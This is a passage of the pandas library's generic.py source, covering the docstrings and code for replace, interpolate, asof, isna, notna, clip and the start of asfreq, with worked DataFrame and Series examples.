- First, if `to_replace` and `value` are both lists, they
**must** be the same length.
- Second, if ``regex=True`` then all of the strings in **both**
lists will be interpreted as regexs otherwise they will match
directly. This doesn't matter much for `value` since there
are only a few possible substitution regexes you can use.
- str, regex and numeric rules apply as above.
* dict:
- Dicts can be used to specify different replacement values
for different existing values. For example,
``{'a': 'b', 'y': 'z'}`` replaces the value 'a' with 'b' and
'y' with 'z'. To use a dict in this way the `value`
parameter should be `None`.
- For a DataFrame a dict can specify that different values
should be replaced in different columns. For example,
``{'a': 1, 'b': 'z'}`` looks for the value 1 in column 'a'
and the value 'z' in column 'b' and replaces these values
with whatever is specified in `value`. The `value` parameter
should not be ``None`` in this case. You can treat this as a
special case of passing two lists except that you are
specifying the column to search in.
- For a DataFrame nested dictionaries, e.g.,
``{'a': {'b': np.nan}}``, are read as follows: look in column
'a' for the value 'b' and replace it with NaN. The `value`
parameter should be ``None`` to use a nested dict in this
way. You can nest regular expressions as well. Note that
column names (the top-level dictionary keys in a nested
dictionary) **cannot** be regular expressions.
* None:
- This means that the `regex` argument must be a string,
compiled regular expression, or list, dict, ndarray or
Series of such elements. If `value` is also ``None`` then
this **must** be a nested dictionary or Series.
See the examples section for examples of each of these.
value : scalar, dict, list, str, regex, default None
Value to replace any values matching `to_replace` with.
For a DataFrame a dict of values can be used to specify which
value to use for each column (columns not in the dict will not be
filled). Regular expressions, strings and lists or dicts of such
objects are also allowed.
inplace : bool, default False
If True, in place. Note: this will modify any
other views on this object (e.g. a column from a DataFrame).
Returns the caller if this is True.
limit : int, default None
Maximum size gap to forward or backward fill.
regex : bool or same types as `to_replace`, default False
Whether to interpret `to_replace` and/or `value` as regular
expressions. If this is ``True`` then `to_replace` *must* be a
string. Alternatively, this could be a regular expression or a
list, dict, or array of regular expressions in which case
`to_replace` must be ``None``.
method : {'pad', 'ffill', 'bfill', `None`}
The method to use when for replacement, when `to_replace` is a
scalar, list or tuple and `value` is ``None``.
.. versionchanged:: 0.23.0
Added to DataFrame.
Returns
-------
%(klass)s
Object after replacement.
Raises
------
AssertionError
* If `regex` is not a ``bool`` and `to_replace` is not
``None``.
TypeError
* If `to_replace` is not a scalar, array-like, ``dict``, or ``None``
* If `to_replace` is a ``dict`` and `value` is not a ``list``,
``dict``, ``ndarray``, or ``Series``
* If `to_replace` is ``None`` and `regex` is not compilable
into a regular expression or is a list, dict, ndarray, or
Series.
* When replacing multiple ``bool`` or ``datetime64`` objects and
the arguments to `to_replace` does not match the type of the
value being replaced
ValueError
* If a ``list`` or an ``ndarray`` is passed to `to_replace` and
`value` but they are not the same length.
See Also
--------
%(klass)s.fillna : Fill NA values.
%(klass)s.where : Replace values based on boolean condition.
Series.str.replace : Simple string replacement.
Notes
-----
* Regex substitution is performed under the hood with ``re.sub``. The
rules for substitution for ``re.sub`` are the same.
* Regular expressions will only substitute on strings, meaning you
cannot provide, for example, a regular expression matching floating
point numbers and expect the columns in your frame that have a
numeric dtype to be matched. However, if those floating point
numbers *are* strings, then you can do this.
* This method has *a lot* of options. You are encouraged to experiment
and play with this method to gain intuition about how it works.
* When dict is used as the `to_replace` value, it is like
key(s) in the dict are the to_replace part and
value(s) in the dict are the value parameter.
Examples
--------
**Scalar `to_replace` and `value`**
>>> s = pd.Series([0, 1, 2, 3, 4])
>>> s.replace(0, 5)
0 5
1 1
2 2
3 3
4 4
dtype: int64
>>> df = pd.DataFrame({'A': [0, 1, 2, 3, 4],
... 'B': [5, 6, 7, 8, 9],
... 'C': ['a', 'b', 'c', 'd', 'e']})
>>> df.replace(0, 5)
A B C
0 5 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
**List-like `to_replace`**
>>> df.replace([0, 1, 2, 3], 4)
A B C
0 4 5 a
1 4 6 b
2 4 7 c
3 4 8 d
4 4 9 e
>>> df.replace([0, 1, 2, 3], [4, 3, 2, 1])
A B C
0 4 5 a
1 3 6 b
2 2 7 c
3 1 8 d
4 4 9 e
>>> s.replace([1, 2], method='bfill')
0 0
1 3
2 3
3 3
4 4
dtype: int64
**dict-like `to_replace`**
>>> df.replace({0: 10, 1: 100})
A B C
0 10 5 a
1 100 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': 0, 'B': 5}, 100)
A B C
0 100 100 a
1 1 6 b
2 2 7 c
3 3 8 d
4 4 9 e
>>> df.replace({'A': {0: 100, 4: 400}})
A B C
0 100 5 a
1 1 6 b
2 2 7 c
3 3 8 d
4 400 9 e
**Regular expression `to_replace`**
>>> df = pd.DataFrame({'A': ['bat', 'foo', 'bait'],
... 'B': ['abc', 'bar', 'xyz']})
>>> df.replace(to_replace=r'^ba.$', value='new', regex=True)
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace({'A': r'^ba.$'}, {'A': 'new'}, regex=True)
A B
0 new abc
1 foo bar
2 bait xyz
>>> df.replace(regex=r'^ba.$', value='new')
A B
0 new abc
1 foo new
2 bait xyz
>>> df.replace(regex={r'^ba.$': 'new', 'foo': 'xyz'})
A B
0 new abc
1 xyz new
2 bait xyz
>>> df.replace(regex=[r'^ba.$', 'foo'], value='new')
A B
0 new abc
1 new new
2 bait xyz
Note that when replacing multiple ``bool`` or ``datetime64`` objects,
the data types in the `to_replace` parameter must match the data
type of the value being replaced:
>>> df = pd.DataFrame({'A': [True, False, True],
... 'B': [False, True, False]})
>>> df.replace({'a string': 'new value', True: False}) # raises
Traceback (most recent call last):
...
TypeError: Cannot compare types 'ndarray(dtype=bool)' and 'str'
This raises a ``TypeError`` because one of the ``dict`` keys is not of
the correct type for replacement.
Compare the behavior of ``s.replace({'a': None})`` and
``s.replace('a', None)`` to understand the peculiarities
of the `to_replace` parameter:
>>> s = pd.Series([10, 'a', 'a', 'b', 'a'])
When one uses a dict as the `to_replace` value, it is like the
value(s) in the dict are equal to the `value` parameter.
``s.replace({'a': None})`` is equivalent to
``s.replace(to_replace={'a': None}, value=None, method=None)``:
>>> s.replace({'a': None})
0 10
1 None
2 None
3 b
4 None
dtype: object
When ``value=None`` and `to_replace` is a scalar, list or
tuple, `replace` uses the method parameter (default 'pad') to do the
replacement. So this is why the 'a' values are being replaced by 10
in rows 1 and 2 and 'b' in row 4 in this case.
The command ``s.replace('a', None)`` is actually equivalent to
``s.replace(to_replace='a', value=None, method='pad')``:
>>> s.replace('a', None)
0 10
1 10
2 10
3 b
4 b
dtype: object
"""
@Appender(_shared_docs["replace"] % _shared_doc_kwargs)
def replace(
self,
to_replace=None,
value=None,
inplace=False,
limit=None,
regex=False,
method="pad",
):
if not (
is_scalar(to_replace)
or isinstance(to_replace, pd.Series)
or is_re_compilable(to_replace)
or is_list_like(to_replace)
):
raise TypeError(
"Expecting 'to_replace' to be either a scalar, array-like, "
"dict or None, got invalid type "
f"{repr(type(to_replace).__name__)}"
)
inplace = validate_bool_kwarg(inplace, "inplace")
if not is_bool(regex) and to_replace is not None:
raise AssertionError("'to_replace' must be 'None' if 'regex' is not a bool")
self._consolidate_inplace()
if value is None:
# passing a single value that is scalar like
# when value is None (GH5319), for compat
if not is_dict_like(to_replace) and not is_dict_like(regex):
to_replace = [to_replace]
if isinstance(to_replace, (tuple, list)):
if isinstance(self, ABCDataFrame):
return self.apply(
_single_replace, args=(to_replace, method, inplace, limit)
)
return _single_replace(self, to_replace, method, inplace, limit)
if not is_dict_like(to_replace):
if not is_dict_like(regex):
raise TypeError(
'If "to_replace" and "value" are both None '
'and "to_replace" is not a list, then '
"regex must be a mapping"
)
to_replace = regex
regex = True
items = list(to_replace.items())
keys, values = zip(*items) if items else ([], [])
are_mappings = [is_dict_like(v) for v in values]
if any(are_mappings):
if not all(are_mappings):
raise TypeError(
"If a nested mapping is passed, all values "
"of the top level mapping must be mappings"
)
# passed a nested dict/Series
to_rep_dict = {}
value_dict = {}
for k, v in items:
keys, values = list(zip(*v.items())) or ([], [])
to_rep_dict[k] = list(keys)
value_dict[k] = list(values)
to_replace, value = to_rep_dict, value_dict
else:
to_replace, value = keys, values
return self.replace(
to_replace, value, inplace=inplace, limit=limit, regex=regex
)
else:
# need a non-zero len on all axes
if not self.size:
return self
new_data = self._data
if is_dict_like(to_replace):
if is_dict_like(value): # {'A' : NA} -> {'A' : 0}
res = self if inplace else self.copy()
for c, src in to_replace.items():
if c in value and c in self:
# object conversion is handled in
# series.replace which is called recursively
res[c] = res[c].replace(
to_replace=src,
value=value[c],
inplace=False,
regex=regex,
)
return None if inplace else res
# {'A': NA} -> 0
elif not is_list_like(value):
keys = [(k, src) for k, src in to_replace.items() if k in self]
keys_len = len(keys) - 1
for i, (k, src) in enumerate(keys):
convert = i == keys_len
new_data = new_data.replace(
to_replace=src,
value=value,
filter=[k],
inplace=inplace,
regex=regex,
convert=convert,
)
else:
raise TypeError("value argument must be scalar, dict, or Series")
elif is_list_like(to_replace): # [NA, ''] -> [0, 'missing']
if is_list_like(value):
if len(to_replace) != len(value):
raise ValueError(
f"Replacement lists must match in length. "
f"Expecting {len(to_replace)} got {len(value)} "
)
new_data = self._data.replace_list(
src_list=to_replace,
dest_list=value,
inplace=inplace,
regex=regex,
)
else: # [NA, ''] -> 0
new_data = self._data.replace(
to_replace=to_replace, value=value, inplace=inplace, regex=regex
)
elif to_replace is None:
if not (
is_re_compilable(regex)
or is_list_like(regex)
or is_dict_like(regex)
):
raise TypeError(
f"'regex' must be a string or a compiled regular expression "
f"or a list or dict of strings or regular expressions, "
f"you passed a {repr(type(regex).__name__)}"
)
return self.replace(
regex, value, inplace=inplace, limit=limit, regex=True
)
else:
# dest iterable dict-like
if is_dict_like(value): # NA -> {'A' : 0, 'B' : -1}
new_data = self._data
for k, v in value.items():
if k in self:
new_data = new_data.replace(
to_replace=to_replace,
value=v,
filter=[k],
inplace=inplace,
regex=regex,
)
elif not is_list_like(value): # NA -> 0
new_data = self._data.replace(
to_replace=to_replace, value=value, inplace=inplace, regex=regex
)
else:
raise TypeError(
f'Invalid "to_replace" type: {repr(type(to_replace).__name__)}'
)
if inplace:
self._update_inplace(new_data)
else:
return self._constructor(new_data).__finalize__(self)
_shared_docs[
"interpolate"
] = """
Please note that only ``method='linear'`` is supported for
DataFrame/Series with a MultiIndex.
Parameters
----------
method : str, default 'linear'
Interpolation technique to use. One of:
* 'linear': Ignore the index and treat the values as equally
spaced. This is the only method supported on MultiIndexes.
* 'time': Works on daily and higher resolution data to interpolate
given length of interval.
* 'index', 'values': use the actual numerical values of the index.
* 'pad': Fill in NaNs using existing values.
* 'nearest', 'zero', 'slinear', 'quadratic', 'cubic', 'spline',
'barycentric', 'polynomial': Passed to
`scipy.interpolate.interp1d`. These methods use the numerical
values of the index. Both 'polynomial' and 'spline' require that
you also specify an `order` (int), e.g.
``df.interpolate(method='polynomial', order=5)``.
* 'krogh', 'piecewise_polynomial', 'spline', 'pchip', 'akima':
Wrappers around the SciPy interpolation methods of similar
names. See `Notes`.
* 'from_derivatives': Refers to
`scipy.interpolate.BPoly.from_derivatives` which
replaces 'piecewise_polynomial' interpolation method in
scipy 0.18.
axis : {0 or 'index', 1 or 'columns', None}, default None
Axis to interpolate along.
limit : int, optional
Maximum number of consecutive NaNs to fill. Must be greater than
0.
inplace : bool, default False
Update the data in place if possible.
limit_direction : {'forward', 'backward', 'both'}, default 'forward'
If limit is specified, consecutive NaNs will be filled in this
direction.
limit_area : {`None`, 'inside', 'outside'}, default None
If limit is specified, consecutive NaNs will be filled with this
restriction.
* ``None``: No fill restriction.
* 'inside': Only fill NaNs surrounded by valid values
(interpolate).
* 'outside': Only fill NaNs outside valid values (extrapolate).
.. versionadded:: 0.23.0
downcast : optional, 'infer' or None, defaults to None
Downcast dtypes if possible.
**kwargs
Keyword arguments to pass on to the interpolating function.
Returns
-------
Series or DataFrame
Returns the same object type as the caller, interpolated at
some or all ``NaN`` values.
See Also
--------
fillna : Fill missing values using different methods.
scipy.interpolate.Akima1DInterpolator : Piecewise cubic polynomials
(Akima interpolator).
scipy.interpolate.BPoly.from_derivatives : Piecewise polynomial in the
Bernstein basis.
scipy.interpolate.interp1d : Interpolate a 1-D function.
scipy.interpolate.KroghInterpolator : Interpolate polynomial (Krogh
interpolator).
scipy.interpolate.PchipInterpolator : PCHIP 1-d monotonic cubic
interpolation.
scipy.interpolate.CubicSpline : Cubic spline data interpolator.
Notes
-----
The 'krogh', 'piecewise_polynomial', 'spline', 'pchip' and 'akima'
methods are wrappers around the respective SciPy implementations of
similar names. These use the actual numerical values of the index.
For more information on their behavior, see the
`SciPy documentation
<https://docs.scipy.org/doc/scipy/reference/interpolate.html#univariate-interpolation>`__
and `SciPy tutorial
<https://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html>`__.
Examples
--------
Filling in ``NaN`` in a :class:`~pandas.Series` via linear
interpolation.
>>> s = pd.Series([0, 1, np.nan, 3])
>>> s
0 0.0
1 1.0
2 NaN
3 3.0
dtype: float64
>>> s.interpolate()
0 0.0
1 1.0
2 2.0
3 3.0
dtype: float64
Filling in ``NaN`` in a Series by padding, but filling at most two
consecutive ``NaN`` at a time.
>>> s = pd.Series([np.nan, "single_one", np.nan,
... "fill_two_more", np.nan, np.nan, np.nan,
... 4.71, np.nan])
>>> s
0 NaN
1 single_one
2 NaN
3 fill_two_more
4 NaN
5 NaN
6 NaN
7 4.71
8 NaN
dtype: object
>>> s.interpolate(method='pad', limit=2)
0 NaN
1 single_one
2 single_one
3 fill_two_more
4 fill_two_more
5 fill_two_more
6 NaN
7 4.71
8 4.71
dtype: object
Filling in ``NaN`` in a Series via polynomial interpolation or splines:
Both 'polynomial' and 'spline' methods require that you also specify
an ``order`` (int).
>>> s = pd.Series([0, 2, np.nan, 8])
>>> s.interpolate(method='polynomial', order=2)
0 0.000000
1 2.000000
2 4.666667
3 8.000000
dtype: float64
Fill the DataFrame forward (that is, going down) along each column
using linear interpolation.
Note how the last entry in column 'a' is interpolated differently,
because there is no entry after it to use for interpolation.
Note how the first entry in column 'b' remains ``NaN``, because there
is no entry before it to use for interpolation.
>>> df = pd.DataFrame([(0.0, np.nan, -1.0, 1.0),
... (np.nan, 2.0, np.nan, np.nan),
... (2.0, 3.0, np.nan, 9.0),
... (np.nan, 4.0, -4.0, 16.0)],
... columns=list('abcd'))
>>> df
a b c d
0 0.0 NaN -1.0 1.0
1 NaN 2.0 NaN NaN
2 2.0 3.0 NaN 9.0
3 NaN 4.0 -4.0 16.0
>>> df.interpolate(method='linear', limit_direction='forward', axis=0)
a b c d
0 0.0 NaN -1.0 1.0
1 1.0 2.0 -2.0 5.0
2 2.0 3.0 -3.0 9.0
3 2.0 4.0 -4.0 16.0
Using polynomial interpolation.
>>> df['d'].interpolate(method='polynomial', order=2)
0 1.0
1 4.0
2 9.0
3 16.0
Name: d, dtype: float64
"""
@Appender(_shared_docs["interpolate"] % _shared_doc_kwargs)
def interpolate(
self,
method="linear",
axis=0,
limit=None,
inplace=False,
limit_direction="forward",
limit_area=None,
downcast=None,
**kwargs,
):
"""
Interpolate values according to different methods.
"""
inplace = validate_bool_kwarg(inplace, "inplace")
axis = self._get_axis_number(axis)
if axis == 0:
ax = self._info_axis_name
_maybe_transposed_self = self
elif axis == 1:
_maybe_transposed_self = self.T
ax = 1
ax = _maybe_transposed_self._get_axis_number(ax)
if _maybe_transposed_self.ndim == 2:
alt_ax = 1 - ax
else:
alt_ax = ax
if isinstance(_maybe_transposed_self.index, MultiIndex) and method != "linear":
raise ValueError(
"Only `method=linear` interpolation is supported on MultiIndexes."
)
if _maybe_transposed_self._data.get_dtype_counts().get("object") == len(
_maybe_transposed_self.T
):
raise TypeError(
"Cannot interpolate with all object-dtype columns "
"in the DataFrame. Try setting at least one "
"column to a numeric dtype."
)
# create/use the index
if method == "linear":
# prior default
index = np.arange(len(_maybe_transposed_self._get_axis(alt_ax)))
else:
index = _maybe_transposed_self._get_axis(alt_ax)
methods = {"index", "values", "nearest", "time"}
is_numeric_or_datetime = (
is_numeric_dtype(index)
or is_datetime64_any_dtype(index)
or is_timedelta64_dtype(index)
)
if method not in methods and not is_numeric_or_datetime:
raise ValueError(
"Index column must be numeric or datetime type when "
f"using {method} method other than linear. "
"Try setting a numeric or datetime index column before "
"interpolating."
)
if isna(index).any():
raise NotImplementedError(
"Interpolation with NaNs in the index "
"has not been implemented. Try filling "
"those NaNs before interpolating."
)
data = _maybe_transposed_self._data
new_data = data.interpolate(
method=method,
axis=ax,
index=index,
limit=limit,
limit_direction=limit_direction,
limit_area=limit_area,
inplace=inplace,
downcast=downcast,
**kwargs,
)
if inplace:
if axis == 1:
new_data = self._constructor(new_data).T._data
self._update_inplace(new_data)
else:
res = self._constructor(new_data).__finalize__(self)
if axis == 1:
res = res.T
return res
# ----------------------------------------------------------------------
# Timeseries methods Methods
def asof(self, where, subset=None):
"""
Return the last row(s) without any NaNs before `where`.
The last row (for each element in `where`, if list) without any
NaN is taken.
In case of a :class:`~pandas.DataFrame`, the last row without NaN
considering only the subset of columns (if not `None`)
If there is no good value, NaN is returned for a Series or
a Series of NaN values for a DataFrame
Parameters
----------
where : date or array-like of dates
Date(s) before which the last row(s) are returned.
subset : str or array-like of str, default `None`
For DataFrame, if not `None`, only use these columns to
check for NaNs.
Returns
-------
scalar, Series, or DataFrame
The return can be:
* scalar : when `self` is a Series and `where` is a scalar
* Series: when `self` is a Series and `where` is an array-like,
or when `self` is a DataFrame and `where` is a scalar
* DataFrame : when `self` is a DataFrame and `where` is an
array-like
Return scalar, Series, or DataFrame.
See Also
--------
merge_asof : Perform an asof merge. Similar to left join.
Notes
-----
Dates are assumed to be sorted. Raises if this is not the case.
Examples
--------
A Series and a scalar `where`.
>>> s = pd.Series([1, 2, np.nan, 4], index=[10, 20, 30, 40])
>>> s
10 1.0
20 2.0
30 NaN
40 4.0
dtype: float64
>>> s.asof(20)
2.0
For a sequence `where`, a Series is returned. The first value is
NaN, because the first element of `where` is before the first
index value.
>>> s.asof([5, 20])
5 NaN
20 2.0
dtype: float64
Missing values are not considered. The following is ``2.0``, not
NaN, even though NaN is at the index location for ``30``.
>>> s.asof(30)
2.0
Take all columns into consideration
>>> df = pd.DataFrame({'a': [10, 20, 30, 40, 50],
... 'b': [None, None, None, None, 500]},
... index=pd.DatetimeIndex(['2018-02-27 09:01:00',
... '2018-02-27 09:02:00',
... '2018-02-27 09:03:00',
... '2018-02-27 09:04:00',
... '2018-02-27 09:05:00']))
>>> df.asof(pd.DatetimeIndex(['2018-02-27 09:03:30',
... '2018-02-27 09:04:30']))
a b
2018-02-27 09:03:30 NaN NaN
2018-02-27 09:04:30 NaN NaN
Take a single column into consideration
>>> df.asof(pd.DatetimeIndex(['2018-02-27 09:03:30',
... '2018-02-27 09:04:30']),
... subset=['a'])
a b
2018-02-27 09:03:30 30.0 NaN
2018-02-27 09:04:30 40.0 NaN
"""
if isinstance(where, str):
where = Timestamp(where)
if not self.index.is_monotonic:
raise ValueError("asof requires a sorted index")
is_series = isinstance(self, ABCSeries)
if is_series:
if subset is not None:
raise ValueError("subset is not valid for Series")
else:
if subset is None:
subset = self.columns
if not is_list_like(subset):
subset = [subset]
is_list = is_list_like(where)
if not is_list:
start = self.index[0]
if isinstance(self.index, PeriodIndex):
where = Period(where, freq=self.index.freq)
if where < start:
if not is_series:
from pandas import Series
return Series(index=self.columns, name=where, dtype=np.float64)
return np.nan
# It's always much faster to use a *while* loop here for
# Series than pre-computing all the NAs. However a
# *while* loop is extremely expensive for DataFrame
# so we later pre-compute all the NAs and use the same
# code path whether *where* is a scalar or list.
# See PR: https://github.com/pandas-dev/pandas/pull/14476
if is_series:
loc = self.index.searchsorted(where, side="right")
if loc > 0:
loc -= 1
values = self._values
while loc > 0 and isna(values[loc]):
loc -= 1
return values[loc]
if not isinstance(where, Index):
where = Index(where) if is_list else Index([where])
nulls = self.isna() if is_series else self[subset].isna().any(1)
if nulls.all():
if is_series:
return self._constructor(np.nan, index=where, name=self.name)
elif is_list:
from pandas import DataFrame
return DataFrame(np.nan, index=where, columns=self.columns)
else:
from pandas import Series
return Series(np.nan, index=self.columns, name=where[0])
locs = self.index.asof_locs(where, ~(nulls.values))
# mask the missing
missing = locs == -1
data = self.take(locs)
data.index = where
data.loc[missing] = np.nan
return data if is_list else data.iloc[-1]
# ----------------------------------------------------------------------
# Action Methods
_shared_docs[
"isna"
] = """
Detect missing values.
Return a boolean same-sized object indicating if the values are NA.
NA values, such as None or :attr:`numpy.NaN`, gets mapped to True
values.
Everything else gets mapped to False values. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.isnull : Alias of isna.
%(klass)s.notna : Boolean inverse of isna.
%(klass)s.dropna : Omit axes labels with missing values.
isna : Top-level isna.
Examples
--------
Show which entries in a DataFrame are NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.isna()
age born name toy
0 False True False True
1 False False False False
2 True False False False
Show which entries in a Series are NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.isna()
0 False
1 False
2 True
dtype: bool
"""
@Appender(_shared_docs["isna"] % _shared_doc_kwargs)
def isna(self: FrameOrSeries) -> FrameOrSeries:
return isna(self).__finalize__(self)
@Appender(_shared_docs["isna"] % _shared_doc_kwargs)
def isnull(self: FrameOrSeries) -> FrameOrSeries:
return isna(self).__finalize__(self)
_shared_docs[
"notna"
] = """
Detect existing (non-missing) values.
Return a boolean same-sized object indicating if the values are not NA.
Non-missing values get mapped to True. Characters such as empty
strings ``''`` or :attr:`numpy.inf` are not considered NA values
(unless you set ``pandas.options.mode.use_inf_as_na = True``).
NA values, such as None or :attr:`numpy.NaN`, get mapped to False
values.
Returns
-------
%(klass)s
Mask of bool values for each element in %(klass)s that
indicates whether an element is not an NA value.
See Also
--------
%(klass)s.notnull : Alias of notna.
%(klass)s.isna : Boolean inverse of notna.
%(klass)s.dropna : Omit axes labels with missing values.
notna : Top-level notna.
Examples
--------
Show which entries in a DataFrame are not NA.
>>> df = pd.DataFrame({'age': [5, 6, np.NaN],
... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),
... pd.Timestamp('1940-04-25')],
... 'name': ['Alfred', 'Batman', ''],
... 'toy': [None, 'Batmobile', 'Joker']})
>>> df
age born name toy
0 5.0 NaT Alfred None
1 6.0 1939-05-27 Batman Batmobile
2 NaN 1940-04-25 Joker
>>> df.notna()
age born name toy
0 True False True False
1 True True True True
2 False True True True
Show which entries in a Series are not NA.
>>> ser = pd.Series([5, 6, np.NaN])
>>> ser
0 5.0
1 6.0
2 NaN
dtype: float64
>>> ser.notna()
0 True
1 True
2 False
dtype: bool
"""
@Appender(_shared_docs["notna"] % _shared_doc_kwargs)
def notna(self: FrameOrSeries) -> FrameOrSeries:
return notna(self).__finalize__(self)
@Appender(_shared_docs["notna"] % _shared_doc_kwargs)
def notnull(self: FrameOrSeries) -> FrameOrSeries:
return notna(self).__finalize__(self)
def _clip_with_scalar(self, lower, upper, inplace: bool_t = False):
if (lower is not None and np.any(isna(lower))) or (
upper is not None and np.any(isna(upper))
):
raise ValueError("Cannot use an NA value as a clip threshold")
result = self
mask = isna(self.values)
with np.errstate(all="ignore"):
if upper is not None:
subset = self.to_numpy() <= upper
result = result.where(subset, upper, axis=None, inplace=False)
if lower is not None:
subset = self.to_numpy() >= lower
result = result.where(subset, lower, axis=None, inplace=False)
if np.any(mask):
result[mask] = np.nan
if inplace:
self._update_inplace(result)
else:
return result
def _clip_with_one_bound(self, threshold, method, axis, inplace):
if axis is not None:
axis = self._get_axis_number(axis)
# method is self.le for upper bound and self.ge for lower bound
if is_scalar(threshold) and is_number(threshold):
if method.__name__ == "le":
return self._clip_with_scalar(None, threshold, inplace=inplace)
return self._clip_with_scalar(threshold, None, inplace=inplace)
subset = method(threshold, axis=axis) | isna(self)
# GH #15390
# In order for where method to work, the threshold must
# be transformed to NDFrame from other array like structure.
if (not isinstance(threshold, ABCSeries)) and is_list_like(threshold):
if isinstance(self, ABCSeries):
threshold = self._constructor(threshold, index=self.index)
else:
threshold = _align_method_FRAME(self, threshold, axis, flex=None)[1]
return self.where(subset, threshold, axis=axis, inplace=inplace)
def clip(
self: FrameOrSeries,
lower=None,
upper=None,
axis=None,
inplace: bool_t = False,
*args,
**kwargs,
) -> FrameOrSeries:
"""
Trim values at input threshold(s).
Assigns values outside boundary to boundary values. Thresholds
can be singular values or array like, and in the latter case
the clipping is performed element-wise in the specified axis.
Parameters
----------
lower : float or array_like, default None
Minimum threshold value. All values below this
threshold will be set to it.
upper : float or array_like, default None
Maximum threshold value. All values above this
threshold will be set to it.
axis : int or str axis name, optional
Align object with lower and upper along the given axis.
inplace : bool, default False
Whether to perform the operation in place on the data.
.. versionadded:: 0.21.0
*args, **kwargs
Additional keywords have no effect but might be accepted
for compatibility with numpy.
Returns
-------
Series or DataFrame
Same type as calling object with the values outside the
clip boundaries replaced.
Examples
--------
>>> data = {'col_0': [9, -3, 0, -1, 5], 'col_1': [-2, -7, 6, 8, -5]}
>>> df = pd.DataFrame(data)
>>> df
col_0 col_1
0 9 -2
1 -3 -7
2 0 6
3 -1 8
4 5 -5
Clips per column using lower and upper thresholds:
>>> df.clip(-4, 6)
col_0 col_1
0 6 -2
1 -3 -4
2 0 6
3 -1 6
4 5 -4
Clips using specific lower and upper thresholds per column element:
>>> t = pd.Series([2, -4, -1, 6, 3])
>>> t
0 2
1 -4
2 -1
3 6
4 3
dtype: int64
>>> df.clip(t, t + 4, axis=0)
col_0 col_1
0 6 2
1 -3 -4
2 0 3
3 6 8
4 5 3
"""
inplace = validate_bool_kwarg(inplace, "inplace")
axis = nv.validate_clip_with_axis(axis, args, kwargs)
if axis is not None:
axis = self._get_axis_number(axis)
# GH 17276
# numpy doesn't like NaN as a clip value
# so ignore
# GH 19992
# numpy doesn't drop a list-like bound containing NaN
if not is_list_like(lower) and np.any(isna(lower)):
lower = None
if not is_list_like(upper) and np.any(isna(upper)):
upper = None
# GH 2747 (arguments were reversed)
if lower is not None and upper is not None:
if is_scalar(lower) and is_scalar(upper):
lower, upper = min(lower, upper), max(lower, upper)
# fast-path for scalars
if (lower is None or (is_scalar(lower) and is_number(lower))) and (
upper is None or (is_scalar(upper) and is_number(upper))
):
return self._clip_with_scalar(lower, upper, inplace=inplace)
result = self
if lower is not None:
result = result._clip_with_one_bound(
lower, method=self.ge, axis=axis, inplace=inplace
)
if upper is not None:
if inplace:
result = self
result = result._clip_with_one_bound(
upper, method=self.le, axis=axis, inplace=inplace
)
return result
_shared_docs[
"groupby"
] = """
Group %(klass)s using a mapper or by a Series of columns.
A groupby operation involves some combination of splitting the
object, applying a function, and combining the results. This can be
used to group large amounts of data and compute operations on these
groups.
Parameters
----------
by : mapping, function, label, or list of labels
Used to determine the groups for the groupby.
If ``by`` is a function, it's called on each value of the object's
index. If a dict or Series is passed, the Series or dict VALUES
will be used to determine the groups (the Series' values are first
aligned; see ``.align()`` method). If an ndarray is passed, the
values are used as-is determine the groups. A label or list of
labels may be passed to group by the columns in ``self``. Notice
that a tuple is interpreted as a (single) key.
axis : {0 or 'index', 1 or 'columns'}, default 0
Split along rows (0) or columns (1).
level : int, level name, or sequence of such, default None
If the axis is a MultiIndex (hierarchical), group by a particular
level or levels.
as_index : bool, default True
For aggregated output, return object with group labels as the
index. Only relevant for DataFrame input. as_index=False is
effectively "SQL-style" grouped output.
sort : bool, default True
Sort group keys. Get better performance by turning this off.
Note this does not influence the order of observations within each
group. Groupby preserves the order of rows within each group.
group_keys : bool, default True
When calling apply, add group keys to index to identify pieces.
squeeze : bool, default False
Reduce the dimensionality of the return type if possible,
otherwise return a consistent type.
observed : bool, default False
This only applies if any of the groupers are Categoricals.
If True: only show observed values for categorical groupers.
If False: show all values for categorical groupers.
.. versionadded:: 0.23.0
Returns
-------
%(klass)sGroupBy
Returns a groupby object that contains information about the groups.
See Also
--------
resample : Convenience method for frequency conversion and resampling
of time series.
Notes
-----
See the `user guide
<https://pandas.pydata.org/pandas-docs/stable/groupby.html>`_ for more.
"""
def asfreq(
self: FrameOrSeries,
freq,
method=None,
how: Optional[str] = None,
normalize: bool_t = False,
fill_value=None,
) -> FrameOrSeries:
"""
Convert TimeSeries to specified frequency.
Optionally provide filling method to pad/backfill missing values.
Returns the original data conformed to a new index with the specified
frequency. ``resample`` is more appropriate if an operation, such as
summarization, is necessary to represent the data at the new frequency.
Parameters
----------
freq : DateOffset or str
method : {'backfill'/'bfill', 'pad'/'ffill'}, default None
Method to use for filling holes in reindexed Series (note this
does not fill NaNs that already were present):
* 'pad' / 'ffill': propagate last valid observation forward to next
valid
* 'backfill' / 'bfill': use NEXT valid observation to fill.
how : {'start', 'end'}, default end
For PeriodIndex only (see PeriodIndex.asfreq).
normalize : bool, default False
Whether to reset output index to midnight.
fill_value : scalar, optional
Value to use for missing values, applied during upsampling (note
this does not fill NaNs that already were present).
Returns
-------
converted : same type as caller
See Also
--------
reindex
Notes
-----
To learn more about the frequency strings, please see `this link
<https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#offset-aliases>`__.
Examples
--------
Start by creating a series with 4 one minute timestamps.
>>> index = pd.date_range('1/1/2000', periods=4, freq='T')
>>> series = pd.Series([0.0, None, 2.0, 3.0], index=index)
